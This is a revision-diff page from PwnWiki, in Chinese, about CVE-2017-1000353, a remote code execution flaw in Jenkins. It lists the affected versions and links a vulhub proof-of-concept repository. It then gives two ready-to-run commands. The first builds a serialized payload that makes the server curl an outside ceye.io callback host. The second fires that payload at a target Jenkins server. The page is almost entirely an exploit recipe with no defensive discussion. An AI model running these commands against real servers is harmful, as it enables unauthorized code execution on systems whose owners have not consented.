Difference between revisions of "CVE-2017-1000353 Jenkins-CI 遠程代碼執行漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== </translate> <pre> Jenkins<=2.56 Jenkins LTS <= 2.46.1 </pre> ==POC== https://github.com/vulhub/CVE-2017-1000353 <pre> java -jar...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==影響版本==
+
==影響版本== <!--T:1-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>

Latest revision as of 15:57, 9 March 2021

Other languages:
Chinese • ‎中文(繁體)‎

影響版本

Jenkins<=2.56
Jenkins LTS <= 2.46.1

POC

https://github.com/vulhub/CVE-2017-1000353

java  -jar  CVE-2017-1000353-SNAPSHOT-all.jar  jenkins_poc.ser  "curl http://xxx.ceye.io"
python exploit.py http://x.x.x.x:8080 jenkins_poc.ser